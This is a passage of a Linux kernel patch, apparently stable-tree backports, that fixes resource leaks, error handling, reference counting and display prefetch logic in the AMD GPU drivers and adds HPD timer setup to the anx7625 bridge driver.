+@@ -333,6 +333,7 @@ aldebaran_mode2_restore_hwcontext(struct amdgpu_reset_control *reset_ctl,
+ {
+ 	struct list_head *reset_device_list = reset_context->reset_device_list;
+ 	struct amdgpu_device *tmp_adev = NULL;
++	struct amdgpu_ras *con;
+ 	int r;
+ 
+ 	if (reset_device_list == NULL)
+@@ -358,7 +359,30 @@ aldebaran_mode2_restore_hwcontext(struct amdgpu_reset_control *reset_ctl,
+ 		 */
+ 		amdgpu_register_gpu_instance(tmp_adev);
+ 
+-		/* Resume RAS */
++		/* Resume RAS, ecc_irq */
++		con = amdgpu_ras_get_context(tmp_adev);
++		if (!amdgpu_sriov_vf(tmp_adev) && con) {
++			if (tmp_adev->sdma.ras &&
++				tmp_adev->sdma.ras->ras_block.ras_late_init) {
++				r = tmp_adev->sdma.ras->ras_block.ras_late_init(tmp_adev,
++						&tmp_adev->sdma.ras->ras_block.ras_comm);
++				if (r) {
++					dev_err(tmp_adev->dev, "SDMA failed to execute ras_late_init! ret:%d\n", r);
++					goto end;
++				}
++			}
++
++			if (tmp_adev->gfx.ras &&
++				tmp_adev->gfx.ras->ras_block.ras_late_init) {
++				r = tmp_adev->gfx.ras->ras_block.ras_late_init(tmp_adev,
++						&tmp_adev->gfx.ras->ras_block.ras_comm);
++				if (r) {
++					dev_err(tmp_adev->dev, "GFX failed to execute ras_late_init! ret:%d\n", r);
++					goto end;
++				}
++			}
++		}
++
+ 		amdgpu_ras_resume(tmp_adev);
+ 
+ 		/* Update PSP FW topology after reset */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c
+index 469785d337911..1ef758ac5076e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c
+@@ -90,7 +90,7 @@ struct amdgpu_amdkfd_fence *to_amdgpu_amdkfd_fence(struct dma_fence *f)
+ 		return NULL;
+ 
+ 	fence = container_of(f, struct amdgpu_amdkfd_fence, base);
+-	if (fence && f->ops == &amdkfd_fence_ops)
++	if (f->ops == &amdkfd_fence_ops)
+ 		return fence;
+ 
+ 	return NULL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index a5352e5e2bd47..4b91f95066eca 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1310,6 +1310,7 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 				return true;
+ 
+ 			fw_ver = *((uint32_t *)adev->pm.fw->data + 69);
++			release_firmware(adev->pm.fw);
+ 			if (fw_ver < 0x00160e00)
+ 				return true;
+ 		}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index 2bc791ed8830a..ea0fb079f942a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -808,19 +808,26 @@ int amdgpu_gmc_vram_checking(struct amdgpu_device *adev)
+ 	 * seconds, so here, we just pick up three parts for emulation.
+ 	 */
+ 	ret = memcmp(vram_ptr, cptr, 10);
+-	if (ret)
+-		return ret;
++	if (ret) {
++		ret = -EIO;
++		goto release_buffer;
++	}
+ 
+ 	ret = memcmp(vram_ptr + (size / 2), cptr, 10);
+-	if (ret)
+-		return ret;
++	if (ret) {
++		ret = -EIO;
++		goto release_buffer;
++	}
+ 
+ 	ret = memcmp(vram_ptr + size - 10, cptr, 10);
+-	if (ret)
+-		return ret;
++	if (ret) {
++		ret = -EIO;
++		goto release_buffer;
++	}
+ 
++release_buffer:
+ 	amdgpu_bo_free_kernel(&vram_bo, &vram_gpu,
+ 			&vram_ptr);
+ 
+-	return 0;
++	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 0ee7c935fba1f..cde2fd2f71171 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1222,19 +1222,15 @@ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+  * amdgpu_bo_move_notify - notification about a memory move
+  * @bo: pointer to a buffer object
+  * @evict: if this move is evicting the buffer from the graphics address space
+- * @new_mem: new information of the bufer object
+  *
+  * Marks the corresponding &amdgpu_bo buffer object as invalid, also performs
+  * bookkeeping.
+  * TTM driver callback which is called when ttm moves a buffer.
+  */
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
+-			   bool evict,
+-			   struct ttm_resource *new_mem)
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict)
+ {
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(bo->bdev);
+ 	struct amdgpu_bo *abo;
+-	struct ttm_resource *old_mem = bo->resource;
+ 
+ 	if (!amdgpu_bo_is_amdgpu_bo(bo))
+ 		return;
+@@ -1251,13 +1247,6 @@ void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
+ 	/* remember the eviction */
+ 	if (evict)
+ 		atomic64_inc(&adev->num_evictions);
+-
+-	/* update statistics */
+-	if (!new_mem)
+-		return;
+-
+-	/* move_notify is called before move happens */
+-	trace_amdgpu_bo_move(abo, new_mem->mem_type, old_mem->mem_type);
+ }
+ 
+ void amdgpu_bo_get_memory(struct amdgpu_bo *bo, uint64_t *vram_mem,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 6dcd7bab42fbb..2ada421e79e4f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -312,9 +312,7 @@ int amdgpu_bo_set_metadata (struct amdgpu_bo *bo, void *metadata,
+ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+ 			   size_t buffer_size, uint32_t *metadata_size,
+ 			   uint64_t *flags);
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
+-			   bool evict,
+-			   struct ttm_resource *new_mem);
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict);
+ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo);
+ vm_fault_t amdgpu_bo_fault_reserve_notify(struct ttm_buffer_object *bo);
+ void amdgpu_bo_fence(struct amdgpu_bo *bo, struct dma_fence *fence,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c
+index 090e66a1b2842..54bdbd83a8cc7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c
+@@ -191,7 +191,8 @@ static bool amdgpu_sync_test_fence(struct amdgpu_device *adev,
+ 
+ 	/* Never sync to VM updates either. */
+ 	if (fence_owner == AMDGPU_FENCE_OWNER_VM &&
+-	    owner != AMDGPU_FENCE_OWNER_UNDEFINED)
++	    owner != AMDGPU_FENCE_OWNER_UNDEFINED &&
++	    owner != AMDGPU_FENCE_OWNER_KFD)
+ 		return false;
+ 
+ 	/* Ignore fences depending on the sync mode */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index 10469f20a10ca..158b791883f03 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -555,10 +555,11 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 			return r;
+ 	}
+ 
++	trace_amdgpu_bo_move(abo, new_mem->mem_type, old_mem->mem_type);
+ out:
+ 	/* update statistics */
+ 	atomic64_add(bo->base.size, &adev->num_bytes_moved);
+-	amdgpu_bo_move_notify(bo, evict, new_mem);
++	amdgpu_bo_move_notify(bo, evict);
+ 	return 0;
+ }
+ 
+@@ -1503,7 +1504,7 @@ static int amdgpu_ttm_access_memory(struct ttm_buffer_object *bo,
+ static void
+ amdgpu_bo_delete_mem_notify(struct ttm_buffer_object *bo)
+ {
+-	amdgpu_bo_move_notify(bo, false, NULL);
++	amdgpu_bo_move_notify(bo, false);
+ }
+ 
+ static struct ttm_device_funcs amdgpu_bo_driver = {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+index 6e7058a2d1c82..779707f19c886 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+@@ -1110,9 +1110,13 @@ int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
+ 
+ 	if (err)
+ 		return -ENODEV;
++
+ 	err = amdgpu_ucode_validate(*fw);
+-	if (err)
++	if (err) {
+ 		dev_dbg(adev->dev, "\"%s\" failed to validate\n", fw_name);
++		release_firmware(*fw);
++		*fw = NULL;
++	}
+ 
+ 	return err;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+index d96ee48e1706a..35921b41fc27c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+@@ -1144,6 +1144,10 @@ static int gmc_v10_0_hw_fini(void *handle)
+ 
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
++	if (adev->gmc.ecc_irq.funcs &&
++		amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC))
++		amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 7124347d2b6c4..310a5607d83b6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -951,6 +951,11 @@ static int gmc_v11_0_hw_fini(void *handle)
+ 	}
+ 
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
++
++	if (adev->gmc.ecc_irq.funcs &&
++		amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC))
++		amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
++
+ 	gmc_v11_0_gart_disable(adev);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c
+index ec291d28edffd..345f0c9f551c6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c
+@@ -921,8 +921,8 @@ static int gmc_v6_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ static int gmc_v6_0_hw_fini(void *handle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c
+index 979da6f510e88..12411f4c1b9af 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c
+@@ -1110,8 +1110,8 @@ static int gmc_v7_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ static int gmc_v7_0_hw_fini(void *handle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c
+index 382dde1ce74c0..cec9926e8bdd8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c
+@@ -1240,8 +1240,8 @@ static int gmc_v8_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ static int gmc_v8_0_hw_fini(void *handle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+index 0d9e9d9dd4a1d..3e631aefa7917 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+@@ -1861,8 +1861,8 @@ static int gmc_v9_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ /**
+@@ -1900,6 +1900,10 @@ static int gmc_v9_0_hw_fini(void *handle)
+ 
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
++	if (adev->gmc.ecc_irq.funcs &&
++		amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC))
++		amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index 208812512d8a8..7fa5e70f1aace 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -380,14 +380,9 @@ static void svm_range_bo_release(struct kref *kref)
+ 		spin_lock(&svm_bo->list_lock);
+ 	}
+ 	spin_unlock(&svm_bo->list_lock);
+-	if (!dma_fence_is_signaled(&svm_bo->eviction_fence->base)) {
+-		/* We're not in the eviction worker.
+-		 * Signal the fence and synchronize with any
+-		 * pending eviction work.
+-		 */
++	if (!dma_fence_is_signaled(&svm_bo->eviction_fence->base))
++		/* We're not in the eviction worker. Signal the fence. */
+ 		dma_fence_signal(&svm_bo->eviction_fence->base);
+-		cancel_work_sync(&svm_bo->eviction_work);
+-	}
+ 	dma_fence_put(&svm_bo->eviction_fence->base);
+ 	amdgpu_bo_unref(&svm_bo->bo);
+ 	kfree(svm_bo);
+@@ -2246,8 +2241,10 @@ retry:
+ 		mutex_unlock(&svms->lock);
+ 		mmap_write_unlock(mm);
+ 
+-		/* Pairs with mmget in svm_range_add_list_work */
+-		mmput(mm);
++		/* Pairs with mmget in svm_range_add_list_work. If dropping the
++		 * last mm refcount, schedule release work to avoid circular locking
++		 */
++		mmput_async(mm);
+ 
+ 		spin_lock(&svms->deferred_list_lock);
+ 	}
+@@ -2556,6 +2553,7 @@ svm_range_get_range_boundaries(struct kfd_process *p, int64_t addr,
+ {
+ 	struct vm_area_struct *vma;
+ 	struct interval_tree_node *node;
++	struct rb_node *rb_node;
+ 	unsigned long start_limit, end_limit;
+ 
+ 	vma = find_vma(p->mm, addr << PAGE_SHIFT);
+@@ -2578,16 +2576,15 @@ svm_range_get_range_boundaries(struct kfd_process *p, int64_t addr,
+ 	if (node) {
+ 		end_limit = min(end_limit, node->start);
+ 		/* Last range that ends before the fault address */
+-		node = container_of(rb_prev(&node->rb),
+-				    struct interval_tree_node, rb);
++		rb_node = rb_prev(&node->rb);
+ 	} else {
+ 		/* Last range must end before addr because
+ 		 * there was no range after addr
+ 		 */
+-		node = container_of(rb_last(&p->svms.objects.rb_root),
+-				    struct interval_tree_node, rb);
++		rb_node = rb_last(&p->svms.objects.rb_root);
+ 	}
+-	if (node) {
++	if (rb_node) {
++		node = container_of(rb_node, struct interval_tree_node, rb);
+ 		if (node->last >= addr) {
+ 			WARN(1, "Overlap with prev node and page fault addr\n");
+ 			return -EFAULT;
+@@ -3310,13 +3307,14 @@ svm_range_trigger_migration(struct mm_struct *mm, struct svm_range *prange,
+ 
+ int svm_range_schedule_evict_svm_bo(struct amdgpu_amdkfd_fence *fence)
+ {
+-	if (!fence)
+-		return -EINVAL;
+-
+-	if (dma_fence_is_signaled(&fence->base))
+-		return 0;
+-
+-	if (fence->svm_bo) {
++	/* Dereferencing fence->svm_bo is safe here because the fence hasn't
++	 * signaled yet and we're under the protection of the fence->lock.
++	 * After the fence is signaled in svm_range_bo_release, we cannot get
++	 * here any more.
++	 *
++	 * Reference is dropped in svm_range_evict_svm_bo_worker.
++	 */
++	if (svm_bo_ref_unless_zero(fence->svm_bo)) {
+ 		WRITE_ONCE(fence->svm_bo->evicting, 1);
+ 		schedule_work(&fence->svm_bo->eviction_work);
+ 	}
+@@ -3331,8 +3329,6 @@ static void svm_range_evict_svm_bo_worker(struct work_struct *work)
+ 	int r = 0;
+ 
+ 	svm_bo = container_of(work, struct svm_range_bo, eviction_work);
+-	if (!svm_bo_ref_unless_zero(svm_bo))
+-		return; /* svm_bo was freed while eviction was pending */
+ 
+ 	if (mmget_not_zero(svm_bo->eviction_fence->mm)) {
+ 		mm = svm_bo->eviction_fence->mm;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 705d9e91b5aa3..029916971bf66 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -1513,17 +1513,19 @@ static int kfd_add_peer_prop(struct kfd_topology_device *kdev,
+ 		/* CPU->CPU  link*/
+ 		cpu_dev = kfd_topology_device_by_proximity_domain(iolink1->node_to);
+ 		if (cpu_dev) {
+-			list_for_each_entry(iolink3, &cpu_dev->io_link_props, list)
+-				if (iolink3->node_to == iolink2->node_to)
+-					break;
+-
+-			props->weight += iolink3->weight;
+-			props->min_latency += iolink3->min_latency;
+-			props->max_latency += iolink3->max_latency;
+-			props->min_bandwidth = min(props->min_bandwidth,
+-							iolink3->min_bandwidth);
+-			props->max_bandwidth = min(props->max_bandwidth,
+-							iolink3->max_bandwidth);
++			list_for_each_entry(iolink3, &cpu_dev->io_link_props, list) {
++				if (iolink3->node_to != iolink2->node_to)
++					continue;
++
++				props->weight += iolink3->weight;
++				props->min_latency += iolink3->min_latency;
++				props->max_latency += iolink3->max_latency;
++				props->min_bandwidth = min(props->min_bandwidth,
++							   iolink3->min_bandwidth);
++				props->max_bandwidth = min(props->max_bandwidth,
++							   iolink3->max_bandwidth);
++				break;
++			}
+ 		} else {
+ 			WARN(1, "CPU node not found");
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 7a309547c2b3f..f415733f1a979 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1903,6 +1903,10 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		wait_for_no_pipes_pending(dc, context);
+ 		/* pplib is notified if disp_num changed */
+ 		dc->hwss.optimize_bandwidth(dc, context);
++		/* Need to do otg sync again as otg could be out of sync due to otg
++		 * workaround applied during clock update
++		 */
++		dc_trigger_sync(dc, context);
+ 	}
+ 
+ 	if (dc->hwss.update_dsc_pg)
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+index 46c2b991aa108..811c117665e73 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+@@ -244,7 +244,7 @@ enum pixel_format {
+ #define DC_MAX_DIRTY_RECTS 3
+ struct dc_flip_addrs {
+ 	struct dc_plane_address address;
+-	unsigned int flip_timestamp_in_us;
++	unsigned long long flip_timestamp_in_us;
+ 	bool flip_immediate;
+ 	/* TODO: add flip duration for FreeSync */
+ 	bool triplebuffer_flips;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 19f55657272e4..cc8c1a48c5c4d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -810,6 +810,8 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
+ 						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
++					mode_lib->vba.PrefetchModePerState[mode_lib->vba.VoltageLevel][mode_lib->vba.maxMpcComb] > 0 || mode_lib->vba.DRAMClockChangeRequirementFinal == false,
++
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+ 					&v->DSTYAfterScaler[k],
+@@ -3291,6 +3293,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->SwathHeightCThisState[k], v->TWait,
+ 							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
++							mode_lib->vba.PrefetchModePerState[i][j] > 0 || mode_lib->vba.DRAMClockChangeRequirementFinal == false,
+ 
+ 							/* Output */
+ 							&v->dummy_vars.dml32_ModeSupportAndSystemConfigurationFull.DSTXAfterScaler[k],
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+index 23e4be2ad63f9..7f4fc49be35ca 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+@@ -3418,6 +3418,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 		unsigned int SwathHeightC,
+ 		double TWait,
+ 		double TPreReq,
++		bool ExtendPrefetchIfPossible,
+ 		/* Output */
+ 		double   *DSTXAfterScaler,
+ 		double   *DSTYAfterScaler,
+@@ -3887,12 +3888,32 @@ bool dml32_CalculatePrefetchSchedule(
+ 			/* Clamp to oto for bandwidth calculation */
+ 			LinesForPrefetchBandwidth = dst_y_prefetch_oto;
+ 		} else {
+-			*DestinationLinesForPrefetch = dst_y_prefetch_equ;
+-			TimeForFetchingMetaPTE = Tvm_equ;
+-			TimeForFetchingRowInVBlank = Tr0_equ;
+-			*PrefetchBandwidth = prefetch_bw_equ;
+-			/* Clamp to equ for bandwidth calculation */
+-			LinesForPrefetchBandwidth = dst_y_prefetch_equ;
++			/* For mode programming we want to extend the prefetch as much as possible
++			 * (up to oto, or as long as we can for equ) if we're not already applying
++			 * the 60us prefetch requirement. This is to avoid intermittent underflow
++			 * issues during prefetch.
++			 *
++			 * The prefetch extension is applied under the following scenarios:
++			 * 1. We're in prefetch mode > 0 (i.e. we don't support MCLK switch in blank)
++			 * 2. We're using subvp or drr methods of p-state switch, in which case we
++			 *    we don't care if prefetch takes up more of the blanking time
++			 *
++			 * Mode programming typically chooses the smallest prefetch time possible
++			 * (i.e. highest bandwidth during prefetch) presumably to create margin between
++			 * p-states / c-states that happen in vblank and prefetch. Therefore we only
++			 * apply this prefetch extension when p-state in vblank is not required (UCLK
++			 * p-states take up the most vblank time).
++			 */
++			if (ExtendPrefetchIfPossible && TPreReq == 0 && VStartup < MaxVStartup) {
++				MyError = true;
++			} else {
++				*DestinationLinesForPrefetch = dst_y_prefetch_equ;
++				TimeForFetchingMetaPTE = Tvm_equ;
++				TimeForFetchingRowInVBlank = Tr0_equ;
++				*PrefetchBandwidth = prefetch_bw_equ;
++				/* Clamp to equ for bandwidth calculation */
++				LinesForPrefetchBandwidth = dst_y_prefetch_equ;
++			}
+ 		}
+ 
+ 		*DestinationLinesToRequestVMInVBlank = dml_ceil(4.0 * TimeForFetchingMetaPTE / LineTime, 1.0) / 4.0;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+index 779c6805f5997..1823434d8ede2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+@@ -744,6 +744,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 		unsigned int SwathHeightC,
+ 		double TWait,
+ 		double TPreReq,
++		bool ExtendPrefetchIfPossible,
+ 		/* Output */
+ 		double   *DSTXAfterScaler,
+ 		double   *DSTYAfterScaler,
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index e2f436dea5654..67287ad07226c 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -818,8 +818,6 @@ bool is_psr_su_specific_panel(struct dc_link *link)
+ 				isPSRSUSupported = false;
+ 			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
+ 				isPSRSUSupported = false;
+-			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
+-				isPSRSUSupported = false;
+ 			else if (dpcd_caps->psr_info.force_psrsu_cap == 0x1)
+ 				isPSRSUSupported = true;
+ 		}
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c
+index f2a55c1413f59..17882f8dfdd34 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c
+@@ -200,7 +200,7 @@ static int get_platform_power_management_table(
+ 		struct pp_hwmgr *hwmgr,
+ 		ATOM_Tonga_PPM_Table *atom_ppm_table)
+ {
+-	struct phm_ppm_table *ptr = kzalloc(sizeof(ATOM_Tonga_PPM_Table), GFP_KERNEL);
++	struct phm_ppm_table *ptr = kzalloc(sizeof(*ptr), GFP_KERNEL);
+ 	struct phm_ppt_v1_information *pp_table_information =
+ 		(struct phm_ppt_v1_information *)(hwmgr->pptable);
+ 
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index 5f8137e9cfd7a..77a304ac4d75e 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -1300,10 +1300,32 @@ static void anx7625_config(struct anx7625_data *ctx)
+ 			  XTAL_FRQ_SEL, XTAL_FRQ_27M);
+ }
+ 
++static int anx7625_hpd_timer_config(struct anx7625_data *ctx)
++{
++	int ret;
++
++	/* Set irq detect window to 2ms */
++	ret = anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
++				HPD_DET_TIMER_BIT0_7, HPD_TIME & 0xFF);
++	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
++				 HPD_DET_TIMER_BIT8_15,
++				 (HPD_TIME >> 8) & 0xFF);
++	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
++				 HPD_DET_TIMER_BIT16_23,
++				 (HPD_TIME >> 16) & 0xFF);
++
++	return ret;
++}
++
++static int anx7625_read_hpd_gpio_config_status(struct anx7625_data *ctx)
++{
++	return anx7625_reg_read(ctx, ctx->i2c.rx_p0_client, GPIO_CTRL_2);
++}
++
+ static void anx7625_disable_pd_protocol(struct anx7625_data *ctx)
+ {
+ 	struct device *dev = &ctx->client->dev;
+-	int ret;
++	int ret, val;
+ 
+ 	/* Reset main ocm */
+ 	ret = anx7625_reg_write(ctx, ctx->i2c.rx_p0_client, 0x88, 0x40);
+@@ -1317,6 +1339,19 @@ static void anx7625_disable_pd_protocol(struct anx7625_data *ctx)
+ 		DRM_DEV_DEBUG_DRIVER(dev, "disable PD feature fail.\n");
+ 	else
+ 		DRM_DEV_DEBUG_DRIVER(dev, "disable PD feature succeeded.\n");
++
++	/*
++	 * Make sure the HPD GPIO already be configured after OCM release before
++	 * setting HPD detect window register. Here we poll the status register
++	 * at maximum 40ms, then config HPD irq detect window register
++	 */
++	readx_poll_timeout(anx7625_read_hpd_gpio_config_status,
++			   ctx, val,
++			   ((val & HPD_SOURCE) || (val < 0)),
++			   2000, 2000 * 20);
++
++	/* Set HPD irq detect window to 2ms */
++	anx7625_hpd_timer_config(ctx);
+ }
+ 
+ static int anx7625_ocm_loading_check(struct anx7625_data *ctx)
+@@ -1440,20 +1475,6 @@ static void anx7625_start_dp_work(struct anx7625_data *ctx)
+ 
